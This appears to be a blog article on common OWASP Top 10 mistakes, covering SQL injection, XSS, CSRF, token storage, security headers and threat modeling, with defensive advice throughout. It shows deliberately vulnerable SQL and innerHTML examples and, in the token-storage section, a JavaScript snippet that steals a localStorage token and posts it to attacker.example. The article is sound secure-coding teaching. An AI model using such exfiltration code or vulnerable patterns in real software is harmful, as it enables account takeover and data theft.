Introduction: Why OWASP Top 10 Mistakes Still Matter
Even in 2025, I still see teams tripping over the same OWASP Top 10 mistakes that were already well-known a decade ago. Modern frameworks, cloud platforms, and security tooling have raised the bar, but they’ve also created a dangerous illusion that “the framework has it handled”—until a pentest or real incident proves otherwise.
In my experience reviewing application security for product teams, the root cause is rarely a lack of documentation. It’s usually a mix of tight deadlines, copy‑pasted patterns, and partial understanding of how the OWASP Top 10 actually maps to real code and real misconfigurations. The result: injection flaws hidden in convenience libraries, broken access control behind feature flags, and sensitive data exposed through misconfigured APIs.
This article breaks down the OWASP Top 10 mistakes I still see engineers make, what they look like in day‑to‑day development, and how to avoid them without slowing delivery. If you build or review web applications, treating these as “solved problems” is itself one of the biggest risks. OWASP Top 10 – 2021 Official Introduction and Overview
1. Assuming the ORM Automatically Stops All SQL Injection
One of the OWASP Top 10 mistakes I still encounter is the blind belief that “we use an ORM, so SQL injection is impossible.” ORMs and parameterized queries dramatically reduce risk, but they don’t make unsafe patterns magically safe. The moment raw queries, string concatenation, or dynamic filtering slip in, the protection can evaporate.
In reviews I’ve done for fast‑moving product teams, I’ve seen engineers mix safe ORM calls with just one or two “quick” string-built queries for reporting or search—and those are exactly where injection bugs show up.
How ORMs Get Bypassed in Real Projects
Most issues appear when developers step outside the happy path of simple CRUD:
- Building raw SQL with string concatenation for complex reports or dashboards.
- Using ORM helpers but injecting user input into ORDER BY, LIMIT, or column names without validation.
- Relying on unsafe query builder escape hatches like raw() or nativeQuery and assuming they’re still parameterized.
Here’s the contrast I point out when training teams:
# Safe: parameterized ORM query
user = db.session.execute(
text("SELECT * FROM users WHERE email = :email"),
{"email": user_email}
).first()
# Dangerous: string concatenation with user input
query = f"SELECT * FROM users WHERE email = '{user_email}'" # vulnerable if user_email is untrusted
user = db.session.execute(query).first()
The second pattern is exactly how SQL injection creeps back into a codebase that “uses an ORM everywhere.”
Safer Patterns I Rely On
What has worked best for me is treating the ORM as a tool, not a guarantee:
- Enforce parameterized queries by convention and code review—no exceptions for “quick hacks.”
- Allow raw SQL only in well-documented, isolated modules with extra scrutiny and tests.
- Whitelist allowed values for dynamic sort fields, filters, and pagination instead of injecting them directly into SQL.
When I help teams audit for OWASP Top 10 mistakes, I specifically search for raw query helpers and string concatenation around SQL. It’s usually the fastest way to uncover hidden injection risks that everyone assumed the ORM had already solved.
SQL Injection Prevention – OWASP Cheat Sheet Series
2. Relying on Output Escaping Alone to Prevent XSS
Another of the classic OWASP Top 10 mistakes I still see is assuming that “our templating engine auto-escapes everything, so we’re safe from XSS.” Auto-escaping is hugely valuable, but it only protects certain contexts, and it completely falls apart once data hits unsafe sinks like innerHTML, client-side rendering frameworks, or user-controlled HTML blocks.
When I audit frontends, the pattern is almost always the same: server-side templates are mostly fine, but the real risk lives in JavaScript where developers bypass the safe defaults for just a bit more flexibility or speed.
Where Auto-Escaping Quietly Stops Helping
Some common ways I’ve seen teams reintroduce XSS despite using “safe” templating:
- Assigning user input directly into innerHTML, outerHTML, or document.write.
- Using client-side frameworks but dropping down to dangerouslySetInnerHTML, v-html, or equivalent unsafe APIs.
- Embedding user-controlled strings into event handlers (e.g., onclick attributes) or into script blocks.
Here’s a simple example I’ve used in training sessions to show how easy it is to bypass otherwise safe rendering:
// Backend template engine auto-escapes {{ comment }} - usually safe.
// Later in the frontend, someone adds:
const userComment = getUserComment(); // untrusted input
document.getElementById('comment').innerHTML = userComment; // XSS risk
// Safer: use textContent when you don't truly need HTML
// document.getElementById('comment').textContent = userComment;
That one innerHTML line can completely undermine a carefully configured templating system.
Defense-in-Depth Patterns That Actually Work
The approach that’s worked best for me is to treat auto-escaping as the first layer, not the only one:
- Default to textContent or equivalent safe APIs for DOM updates; only use HTML when there is a real requirement.
- Sanitize any intentionally allowed HTML with a well-maintained, battle-tested HTML sanitizer, not ad hoc regexes.
- Combine this with a tight Content Security Policy (CSP) to limit the impact of any XSS that slips through.
When teams review their frontends with this mindset, they start spotting XSS risks in places they previously assumed their templates had covered, and that’s where real progress against the OWASP Top 10 mistakes begins.
3. Misconfiguring SameSite and CSRF Tokens
CSRF used to be an obvious checkbox: add a hidden token in forms and call it a day. In 2025, with browser-level SameSite protections and complex SPA backends, I actually see more subtle CSRF bugs, not fewer. Teams think “SameSite=Lax is on, so we’re covered,” while missing weak token scopes, missing protections on APIs, or edge cases with cross-domain redirects.
In my own reviews of modern React/Vue/Angular apps, the riskiest cases are hybrid setups: some legacy server-rendered forms, some JSON APIs, some third-party SSO flows. That mix is exactly where misconfigured SameSite and half-implemented CSRF tokens leave gaps.
Where SameSite and Tokens Commonly Go Wrong
These are patterns I routinely flag as OWASP Top 10 mistakes:
- Relying on SameSite=Lax cookies alone while exposing state-changing JSON endpoints without any CSRF token.
- Issuing CSRF tokens but not validating them on all unsafe methods (e.g., protecting POST but forgetting PATCH/DELETE).
- SPAs that store auth in cookies, but omit CSRF headers for XHR/fetch requests or forget to rotate tokens on login.
This stripped-down example shows the difference a token makes for a state-changing endpoint:
# Vulnerable: no CSRF token validation, cookie-based auth only POST /api/settings Cookie: session=abc123 # Safer pattern: include and verify CSRF token header POST /api/settings Cookie: session=abc123 X-CSRF-Token: 9f2b7...
On the server side, I always ensure the CSRF token is bound to the user session and verified for every mutating request.
Practical Hardening Steps for SPAs and APIs
What has worked best for me in real projects is a combination of browser features and app-level defenses:
- Set cookies with SameSite=Lax or Strict, Secure, and HttpOnly, but treat SameSite as a mitigation, not the main CSRF control.
- Issue a session-bound CSRF token and send it via a custom header on all unsafe HTTP methods (POST, PUT, PATCH, DELETE).
- For SPAs, fetch the CSRF token from a same-origin, cookie-authenticated endpoint and keep its usage centralized in the HTTP client layer.
When I walk teams through these changes, we usually discover at least one critical endpoint that was assumed “safe because of SameSite,” but in reality had no real CSRF protection at all—exactly the kind of subtle gap that still shows up in OWASP Top 10 mistakes.
Cross-Site Request Forgery Prevention – OWASP Cheat Sheet Series
4. Trusting Frontend Validation to Enforce Security Rules
One OWASP Top 10 mistake I still see in code reviews is treating frontend validation as if it were a security control. Nice UX is valuable, but JavaScript checks, HTML5 constraints, and disabled buttons only protect honest users. Attackers bypass them in seconds with browser dev tools, custom scripts, or direct API calls.
Why Client-Side Checks Are Only Hints
In my own projects, the most painful bugs came from assuming “the form already enforces this” for things like max amounts, allowed roles, or read-only fields. Once someone hits the API directly, those rules vanish unless the backend re-checks them.
- Input constraints (length, format, ranges) must be validated server-side.
- Business rules (discount limits, transfer caps) must be enforced in backend logic.
- Authorization (who can update which record) must be checked against server-side permissions, never just hidden UI.
Here’s the rule of thumb I use: anything that would matter during an incident review belongs on the server. The frontend can guide, but the backend must decide.
5. Storing Sensitive Tokens in Local Storage or JS-Readable Cookies
Putting JWTs or session identifiers in localStorage or JavaScript-readable cookies is still one of the most stubborn OWASP Top 10 mistakes I encounter. On paper it seems convenient for SPAs; in practice, it dramatically raises the impact of any XSS bug, turning a minor issue into full account takeover.
When I’ve helped teams analyze incidents, the story is often the same: a small XSS in a rarely-used page becomes critical because an attacker can simply read localStorage.token or grab a non-HttpOnly cookie and replay it.
How XSS Turns Into Silent Session Theft
Any time a token is accessible via JavaScript, an attacker who finds XSS can usually steal it with one line of code. I often show engineers a simplified example like this:
// Insecure pattern: token in localStorage
localStorage.setItem('authToken', jwt);
// If XSS exists anywhere on the origin, attacker can do:
const stolen = localStorage.getItem('authToken');
fetch('https://attacker.example/steal', {
method: 'POST',
body: stolen
});
The same applies to cookies without the HttpOnly flag; any injected script can read document.cookie and exfiltrate session identifiers.
Safer Patterns I Use for SPAs
In my own SPA architectures, I treat tokens as high-value secrets and minimize their exposure:
- Prefer a server-side session with a Secure, HttpOnly, SameSite cookie rather than a long-lived JWT in localStorage.
- If JWTs are required, keep them in-memory only (never persisted) and rotate/shorten lifetimes aggressively.
- Combine HttpOnly cookies with CSRF protections and a strict CSP to reduce both theft and exploitability.
When I walk teams through this trade-off, most realize the convenience of localStorage isn’t worth turning every XSS into a guaranteed account compromise—exactly the kind of risk that keeps appearing in OWASP Top 10 mistakes.
JWT Security Best Practices | Curity
6. Treating Security Headers as Optional Hardening
Many teams still treat security headers as “nice-to-have extras” instead of core defenses, which is why missing or weak headers keep showing up among OWASP Top 10 mistakes. When I review production apps, it’s common to see strong auth and decent code, but no CSP, no HSTS, and permissive framing—leaving unnecessary exposure to XSS, protocol downgrade, and clickjacking.
Small Headers, Big Risk Reduction
In my own deployments, simply tightening a few headers has massively reduced the blast radius of bugs:
- Content-Security-Policy (CSP) limits where scripts and resources can load from, often turning an exploitable XSS into a blocked request.
- Strict-Transport-Security (HSTS) forces HTTPS, protecting users from downgrade and some man-in-the-middle tricks.
- X-Frame-Options or frame-ancestors in CSP prevents clickjacking by blocking hostile framing.
Here’s a simple baseline I often recommend in nginx or similar:
add_header Content-Security-Policy "default-src 'self'" always; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always; add_header X-Frame-Options "DENY" always;
These headers won’t fix bad code, but in my experience they frequently turn a serious exploit into a blocked or much harder attack path—well worth treating as mandatory, not optional.
7. Mapping OWASP Top 10 to Features, Not to Threat Models
One of the most subtle OWASP Top 10 mistakes I see is treating the list as a compliance checklist: “SQL injection? We use an ORM, check. XSS? We auto-escape, check.” That mindset maps controls to features, not to the actual ways your system can be attacked. In my experience, this is how teams end up with beautiful dashboards of “green checks” while critical business flows are still exposed.
When I sit with product teams, I rarely start with the Top 10 itself. I start with questions like: which actions move money, expose personal data, change ownership, or escalate privileges? The threats to those flows should drive which OWASP Top 10 categories really matter and where to invest effort.
From Checkbox Security to Flow-Centric Thinking
A feature-first view sounds like this: “we added CSRF tokens to all forms” or “we turned on CSP.” A threat-model view sounds more like: “we identified that account recovery is a high-value target, so we hardened it against brute force, token theft, and XSS-based takeover.”
- Start by mapping critical business flows: login, payments, admin changes, data exports.
- Identify assets and actors: what data is valuable, who might attack, and from where.
- Overlay relevant OWASP Top 10 categories onto each flow, not onto each UI screen.
For example, the same login endpoint might be affected by broken authentication, injection in logging, sensitive data exposure, and misconfigured security headers—all at once. A checklist rarely shows that intersection; a threat model does.
Lightweight Threat Modeling I Actually Use
Most teams I work with don’t have time for heavyweight modeling, so I lean on a simple, repeatable pattern during design reviews:
- Whiteboard a single high-risk user journey (e.g., “change email,” “approve invoice”).
- Ask “what if an internal user abused this?” and “what if an external attacker abused this?”
- List concrete risks (XSS, IDOR, CSRF, privilege escalation) and link them back to specific OWASP Top 10 items.
Once that’s written down, it becomes obvious which defenses are must-have and which are nice-to-have. Over time, these small, focused threat-model sessions have given my teams far better coverage than any Top 10 checklist alone.
Threat Modeling – OWASP Cheat Sheet Series
Conclusion: Turning OWASP Top 10 Mistakes into a Secure-by-Default Practice
Across real projects, what I’ve learned is that OWASP Top 10 mistakes rarely come from ignorance of the list—they come from unsafe defaults, rushed decisions, and treating security as an add-on instead of a design constraint. The good news is that small, consistent habits make a huge difference.
Here’s the concise checklist I keep coming back to when I’m helping teams secure web apps:
- Access control: Enforce authorization on the server, with least privilege and clear role boundaries.
- Data handling: Use parameterized queries, output encoding, and strict validation on the backend for all inputs.
- Sessions & tokens: Prefer HttpOnly, Secure, SameSite cookies; avoid localStorage for sensitive tokens.
- CSRF & SameSite: Treat SameSite as a defense-in-depth layer, not a replacement for robust CSRF tokens.
- Client vs server rules: Never rely on frontend checks for anything that impacts security or money.
- Security headers: Ship a solid baseline CSP, HSTS, and frame protections by default.
- Threat modeling: Tie OWASP Top 10 risks to critical user flows and business impact, not just to features.
If teams bake these principles into their frameworks, templates, and review checklists, “secure-by-default” stops being a slogan and becomes the normal way we write web code—dramatically reducing how often OWASP Top 10 mistakes show up in production.

Hi, I’m Cary Huang — a tech enthusiast based in Canada. I’ve spent years working with complex production systems and open-source software. Through TechBuddies.io, my team and I share practical engineering insights, curate relevant tech news, and recommend useful tools and products to help developers learn and work more effectively.





